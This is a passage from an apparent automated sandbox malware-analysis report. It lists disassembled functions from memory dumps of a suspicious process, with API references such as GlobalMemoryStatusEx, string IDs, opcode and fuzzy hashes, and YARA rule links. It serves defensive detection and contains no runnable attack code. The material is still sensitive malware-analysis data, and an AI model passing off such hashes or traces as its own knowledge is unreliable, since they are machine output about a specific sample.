                                                                                                                control_flow_graph 1404 150ec18-150ec56 1405 150ec5e-150ec8c GlobalMemoryStatusEx 1404->1405 1406 150ec95-150ecbd 1405->1406 1407 150ec8e-150ec94 1405->1407 1407->1406
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0150EC7F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4149511246.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_1500000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: a35c8407842f4e894f7549867865ba4e64f9acdf91a1aeee5785010fc82986fa
                                                                                                                • Instruction ID: cf41bdd75bb17621dc6942b141e1ba89d815b8f8c69fc1bd701db64c97769610
                                                                                                                • Opcode Fuzzy Hash: a35c8407842f4e894f7549867865ba4e64f9acdf91a1aeee5785010fc82986fa
                                                                                                                • Instruction Fuzzy Hash: 9C111FB1C002699BCB10DFAAC544BDEFBF4FB48320F24852AD818A7240D378A940CFA5
                                                                                                                Function 06CA4BE5 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: XPcq
                                                                                                                • API String ID: 0-714321711
                                                                                                                • Opcode ID: dbe02a8b7988f34c001359750103400ae72f1f0ebb763c9b0f68dbdd74bdc568
                                                                                                                • Instruction ID: 68c5207ef08fe9817ebbd1c4829c2ae2d9b0d4e738cd0fbd0da26669ce078bfe
                                                                                                                • Opcode Fuzzy Hash: dbe02a8b7988f34c001359750103400ae72f1f0ebb763c9b0f68dbdd74bdc568
                                                                                                                • Instruction Fuzzy Hash: F4416170A102199FEB559FA9C854BAEBBF6FF88700F20852AD105AB394DA708C058B91
                                                                                                                Function 06CADB28 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 32cae795518f7f38725b6f29894c63d45a0c97a19d67cf3e6d193d710d4804a4
                                                                                                                • Instruction ID: 352848428b1061c0f1008defdfa9923833856db65cb4a89f8bfd26b3f38b1abf
                                                                                                                • Opcode Fuzzy Hash: 32cae795518f7f38725b6f29894c63d45a0c97a19d67cf3e6d193d710d4804a4
                                                                                                                • Instruction Fuzzy Hash: 2041C170E0030ADFDB60EFA5D45469EBBB2BF85708F10452EE406EB654DB71E946CB81
                                                                                                                Function 06CADB1F Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: b6ef81f5982e590492175e15841b41de287ce217478a2515aeee3ea67f2e4869
                                                                                                                • Instruction ID: 8ced070682c580c90fb372c473c522f60a6496a956cb046c009177283bccd342
                                                                                                                • Opcode Fuzzy Hash: b6ef81f5982e590492175e15841b41de287ce217478a2515aeee3ea67f2e4869
                                                                                                                • Instruction Fuzzy Hash: D041C070E0030A9FDB60EF65D54469EBBB2FF85708F10452EE406E7650EB70E946CB80
                                                                                                                Function 06CA227D Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 4cc2467097c929d5d8809efc44859e885c3997e35ee11ef7193d8a5e5e292228
                                                                                                                • Instruction ID: 55613468954bf66f7b6e126b1893f2f75768eb1c68b93d47558c509afa6e33bf
                                                                                                                • Opcode Fuzzy Hash: 4cc2467097c929d5d8809efc44859e885c3997e35ee11ef7193d8a5e5e292228
                                                                                                                • Instruction Fuzzy Hash: 07312131B003128FDB999F35C51426F7BE6AF8A604F18442DD006EB394EE39CE46CB91
                                                                                                                Function 06CA2290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 9b829a0cbb97aef484ca17ce94952238454d817187defe316df7dc2c89abc08b
                                                                                                                • Instruction ID: 1b94f9622a54ed1c806416de048f5f43411029992f8b78d6f20a54c581bcaa76
                                                                                                                • Opcode Fuzzy Hash: 9b829a0cbb97aef484ca17ce94952238454d817187defe316df7dc2c89abc08b
                                                                                                                • Instruction Fuzzy Hash: 2E312030B003168FDB989F75C41426F7AE6AF89204F14443CD006EB394EE39DE46CBA1
                                                                                                                Function 06CA5948 Relevance: .3, Instructions: 322COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0bd4a967ea611bfa5b76884f8cec29cabeef5aca133810f3bc13e87a99050409
                                                                                                                • Instruction ID: acc4a7cb901b961bef252d60e0054c5050a910b6517b793ae3392e4530a4b5f9
                                                                                                                • Opcode Fuzzy Hash: 0bd4a967ea611bfa5b76884f8cec29cabeef5aca133810f3bc13e87a99050409
                                                                                                                • Instruction Fuzzy Hash: CEB1B175F002159BDB14DFB4D8946AEB7B6FB88318F608429E806AB354DF34ED46CB81
                                                                                                                Function 06CA6D70 Relevance: .3, Instructions: 257COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 296116c074ce5868fc1268bffa5d7cfbc4b84e590fb8e5165d4de6868208102b
                                                                                                                • Instruction ID: b17bcc1afddeac8630ff7c1584cd75c19870327507622715acbbd6cfadbb2b88
                                                                                                                • Opcode Fuzzy Hash: 296116c074ce5868fc1268bffa5d7cfbc4b84e590fb8e5165d4de6868208102b
                                                                                                                • Instruction Fuzzy Hash: 33A19B34A00305CFCB64DB69D588A6EB7F2FF84358F588469E40AAB354DB36ED45CB90
                                                                                                                Function 06CA6248 Relevance: .2, Instructions: 229COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce0af518f8d7a367a99b3eec87c0f0fd1714aa23e84d289b0894b731a419156f
                                                                                                                • Instruction ID: d99aca80e41a5c6ba9dcc4bfb019839d69d57b88a8d261b91a419c6e8050616f
                                                                                                                • Opcode Fuzzy Hash: ce0af518f8d7a367a99b3eec87c0f0fd1714aa23e84d289b0894b731a419156f
                                                                                                                • Instruction Fuzzy Hash: 0361C071F001224FCB509A7EC88866FAAD7AFC5624B1A413AD80EDB364DE65DD0287C2
                                                                                                                Function 06CA4329 Relevance: .2, Instructions: 219COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 29ed514fca98a21cba45ea1f0651f109c374e53d652f751e51502a53ca7e7dd1
                                                                                                                • Instruction ID: de153d0bd17884036cf48c558e148ea547e54375110bf7b4a99073bea7214699
                                                                                                                • Opcode Fuzzy Hash: 29ed514fca98a21cba45ea1f0651f109c374e53d652f751e51502a53ca7e7dd1
                                                                                                                • Instruction Fuzzy Hash: 4F813D30B0020A9FDF58DFA9D59466EB7F6EF89304F108429D40AEB394EB74DD428B91
                                                                                                                Function 06CA4330 Relevance: .2, Instructions: 218COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1e8478d197b40130b8bd63ea12227f76a5f65b77c788350a900d8a34479432c1
                                                                                                                • Instruction ID: b25c90764553b43a4cbbf77457576c621683e53c84ed21433f9d044f32baf418
                                                                                                                • Opcode Fuzzy Hash: 1e8478d197b40130b8bd63ea12227f76a5f65b77c788350a900d8a34479432c1
                                                                                                                • Instruction Fuzzy Hash: 14813C30B0020A9FDF58DFA9D59465EB7F6EB89304F108429D40AEB394EF74ED428B91
                                                                                                                Function 06CA4321 Relevance: .2, Instructions: 217COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f521f86fef2d38eb459177f514f8d347b9dd283b418b714e2926f5c2ada4b6c0
                                                                                                                • Instruction ID: 5f62b20d5294ae0fbcc21056d48d194608ef4c389e427347393ae882b4ab2610
                                                                                                                • Opcode Fuzzy Hash: f521f86fef2d38eb459177f514f8d347b9dd283b418b714e2926f5c2ada4b6c0
                                                                                                                • Instruction Fuzzy Hash: 68814035B002069FDF58DFA8D5946AEB7F6EF89304F108429D40AEB394EB74DD428B41
                                                                                                                Function 06CAAF78 Relevance: .2, Instructions: 215COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f3999a167a4c5dec9b7edeb59bef891cebdc96d1b8868168a1c760a26cde0d9
                                                                                                                • Instruction ID: 65c6e99cdfb8f1e5ff1266bfdb7400217356217e9293b99f4cfef3e2d23e6cab
                                                                                                                • Opcode Fuzzy Hash: 0f3999a167a4c5dec9b7edeb59bef891cebdc96d1b8868168a1c760a26cde0d9
                                                                                                                • Instruction Fuzzy Hash: 33714C31E0031A8FDF55DFA9D4946AEB7B2FF85308F108629D409AB354EB74DD468B81
                                                                                                                Function 06CA4650 Relevance: .2, Instructions: 214COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ff79d5e099587bd05cf55c3767249b1e794502cb29935392922aa5ce8c677569
                                                                                                                • Instruction ID: 2a17b4aee95a40dc0ffd5fa358e5e1857499e9e2960c0790cbbc1e3f4a569b39
                                                                                                                • Opcode Fuzzy Hash: ff79d5e099587bd05cf55c3767249b1e794502cb29935392922aa5ce8c677569
                                                                                                                • Instruction Fuzzy Hash: 42913C30E1021A8BDF64DF68C980B9DB7B1FF89314F20C599D549AB354EB70AA85CB91
                                                                                                                Function 06CA4658 Relevance: .2, Instructions: 210COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6870183c0cfd93c588f3141b615c3265efa6b01a64fca328f0556345e42607ac
                                                                                                                • Instruction ID: 598543160151a07d0f45475bb176e01020c93ebaa9f7ad5ef49fd429079f77ca
                                                                                                                • Opcode Fuzzy Hash: 6870183c0cfd93c588f3141b615c3265efa6b01a64fca328f0556345e42607ac
                                                                                                                • Instruction Fuzzy Hash: 41913C30E1021A8BDF64DF68C980B9DB7B1FF89304F20C599D549AB355EB70AA85CF91
                                                                                                                Function 06CAEB68 Relevance: .2, Instructions: 204COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6709d38ad3b9a34fa26e22756eebb57bfb22bba2210c99f656f6dd8b4488b5ca
                                                                                                                • Instruction ID: 627d7fd8cf12560c9a9c569c8dc19ef2b4fed21a0f9261e626d9e726ddd1eb52
                                                                                                                • Opcode Fuzzy Hash: 6709d38ad3b9a34fa26e22756eebb57bfb22bba2210c99f656f6dd8b4488b5ca
                                                                                                                • Instruction Fuzzy Hash: EE711931E0120A9FDB54EFA9D994A9EBBF6FF88304F148529D005EB354DB70E946CB90
                                                                                                                Function 06CAEB78 Relevance: .2, Instructions: 201COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d137f11bd6d1ea3a0628a912760455249a191513443bd91379c79662f12e9025
                                                                                                                • Instruction ID: 1b3c90a8cf355e4be07f342321ca18c247e795d6df127fb8c28d9f6de6d9d238
                                                                                                                • Opcode Fuzzy Hash: d137f11bd6d1ea3a0628a912760455249a191513443bd91379c79662f12e9025
                                                                                                                • Instruction Fuzzy Hash: 36710830A0120A9FDB54EFA9D994A9EBBF6FF88304F148529D005EB354DB70E946CB90
                                                                                                                Function 06CAFCD9 Relevance: .2, Instructions: 176COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 26f75a140efadf3fce1ff6071731b477b8cc600b64e825a3ad70f435bc74fa1c
                                                                                                                • Instruction ID: 9c54891f00b079bee0c4aec43f144d6a6001d108ce96323c9a8b14858246004c
                                                                                                                • Opcode Fuzzy Hash: 26f75a140efadf3fce1ff6071731b477b8cc600b64e825a3ad70f435bc74fa1c
                                                                                                                • Instruction Fuzzy Hash: D751D371E0120ADFDF64AFB8E4546ADBBB2FB84319F20886DE126D7250DB318945CB91
                                                                                                                Function 06CAFA93 Relevance: .2, Instructions: 166COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d4835c661007fcb0cc1150b6f1ef5265eaa48fd79595b962741975db2daeadf6
                                                                                                                • Instruction ID: 40a9b37dfaeaeeed10442a5c525de3f5757a78293061579e76973a7c6d062ace
                                                                                                                • Opcode Fuzzy Hash: d4835c661007fcb0cc1150b6f1ef5265eaa48fd79595b962741975db2daeadf6
                                                                                                                • Instruction Fuzzy Hash: EE51E830B103159FEF6466BCD96476F365FD789314F20082ED41AD3398CA79CD854792
                                                                                                                Function 06CA5628 Relevance: .2, Instructions: 166COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 60f968e7537c10be1f7446f02b41d4e310ee3e84bf0af820325ab5a6eeb2db4d
                                                                                                                • Instruction ID: 52d5f20f34d68f9c28dd93d8c9946a926af154d0375267e5f45ecd372163194e
                                                                                                                • Opcode Fuzzy Hash: 60f968e7537c10be1f7446f02b41d4e310ee3e84bf0af820325ab5a6eeb2db4d
                                                                                                                • Instruction Fuzzy Hash: FF514D74E103068FDB60CB69C480A7EF7B2FB45318FA4C96AD55AEB341D634DA81CB91
                                                                                                                Function 06CAFA98 Relevance: .2, Instructions: 163COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 35502cc5d95ffcf0cc18fde1c7452f71f6e3016dc095150dc3aa75c74c948ed6
                                                                                                                • Instruction ID: 9d7e9859a836ea724590a47158af005b620254ec69b90d78a155ba3096a8baec
                                                                                                                • Opcode Fuzzy Hash: 35502cc5d95ffcf0cc18fde1c7452f71f6e3016dc095150dc3aa75c74c948ed6
                                                                                                                • Instruction Fuzzy Hash: 9651E730B1031A9BEF6466BCD96476F365FE789304F20082EE41AD33A8CA79CD954792
                                                                                                                Function 06CAC840 Relevance: .2, Instructions: 160COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0fc2218b9cb5a39149b01edfb04d2e6dbb1944b7a98872a27e2b9f2b48de9ad8
                                                                                                                • Instruction ID: bb45f70b2255639b14260eb9c8e7c25a515cd2795da086d598a195dd019b40cb
                                                                                                                • Opcode Fuzzy Hash: 0fc2218b9cb5a39149b01edfb04d2e6dbb1944b7a98872a27e2b9f2b48de9ad8
                                                                                                                • Instruction Fuzzy Hash: 83517135B0121A8FCB45EF79D994A9EB7F2FB88314B108569E405EB359DB31EC45CB80
                                                                                                                Function 06CA54A8 Relevance: .1, Instructions: 126COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9eec2a713bb41975a9d3f6470f692b5d3f3a7ea74e0de86645f12e65cb9e1845
                                                                                                                • Instruction ID: f1fbf9e4c5d2e90e3589b6d246a3913dda79e6b7d3fa71570444ae4e31d20f6c
                                                                                                                • Opcode Fuzzy Hash: 9eec2a713bb41975a9d3f6470f692b5d3f3a7ea74e0de86645f12e65cb9e1845
                                                                                                                • Instruction Fuzzy Hash: 11413C71E0070A8FDF60CEA9D880AAFF7B2EB84314F50892AE116D7650D731E9598B90
                                                                                                                Function 06CA5618 Relevance: .1, Instructions: 118COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 70a5a662436cd61a443a535db7063261a259ed9f4f0e121aebb325a13fbc97b7
                                                                                                                • Instruction ID: 7f1fc553d5d899b67ad6d0a3917aacf29c21e630415364de00ac77c7cff6697a
                                                                                                                • Opcode Fuzzy Hash: 70a5a662436cd61a443a535db7063261a259ed9f4f0e121aebb325a13fbc97b7
                                                                                                                • Instruction Fuzzy Hash: 2F418175E103068FDF618B69C480A7EFBB2FB45314FA4C92AD459DB341C634DA41CB91
                                                                                                                Function 06CA2140 Relevance: .1, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 674f885e3ead2c3ab689949e28682c110bb2238742ef5b4b91207226023f9289
                                                                                                                • Instruction ID: 15497951d9eff1c7c7dc9c6063ec5b0f9f4839f767d9cc1966cb087dce95ce36
                                                                                                                • Opcode Fuzzy Hash: 674f885e3ead2c3ab689949e28682c110bb2238742ef5b4b91207226023f9289
                                                                                                                • Instruction Fuzzy Hash: D1317C30E102169BCF49CFA5C858AAEBBF2AF89314F18891DE805A7350DB71ED46CB40
                                                                                                                Function 06CAD9D3 Relevance: .1, Instructions: 94COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b7779958a045a7365261d3f20acc9607dc6c7af3b03c2e2cb7f605d5262c5b9f
                                                                                                                • Instruction ID: a39a2459ff0dd30a10a322d18f23acb7dc317bbadae69569f85d598cf7d38612
                                                                                                                • Opcode Fuzzy Hash: b7779958a045a7365261d3f20acc9607dc6c7af3b03c2e2cb7f605d5262c5b9f
                                                                                                                • Instruction Fuzzy Hash: 2A31A130E1031A8FCF55DF69C59468EB7B2FF84304F108929E406EB744EB70EA468B80
                                                                                                                Function 06CAD9D8 Relevance: .1, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5f1d0692dcaad6744582b72742a354eacb8ed44a28168e4d5fccf8cb9bd0fcda
                                                                                                                • Instruction ID: 88228b90ea13ecc6dfc7fa624e3d046b28632d0092d28a0b7e5a2686e5c45f63
                                                                                                                • Opcode Fuzzy Hash: 5f1d0692dcaad6744582b72742a354eacb8ed44a28168e4d5fccf8cb9bd0fcda
                                                                                                                • Instruction Fuzzy Hash: E031A030E1031A8FCF55DF69C59468EB7B2FF85304F108929E406AB744EB70E9468B81
                                                                                                                Function 06CA2150 Relevance: .1, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cdc47e78bdc4602f6c98eacab0088612c00ab213c903e15cfa4a7cd19bd99282
                                                                                                                • Instruction ID: 1a12fa24deab695de3f6202fab644376ce0f433618449eef57b3a914179fc6b2
                                                                                                                • Opcode Fuzzy Hash: cdc47e78bdc4602f6c98eacab0088612c00ab213c903e15cfa4a7cd19bd99282
                                                                                                                • Instruction Fuzzy Hash: 15316F31E1021A9BCF19CFA5D854AAEB7F2BF89314F148919E905E7350DB71ED46CB40
                                                                                                                Function 06CA3B21 Relevance: .1, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f161c366ea56967fde51b1cda70e2d93fa4c29168fc7c03aeabf6b4c8cefb5c0
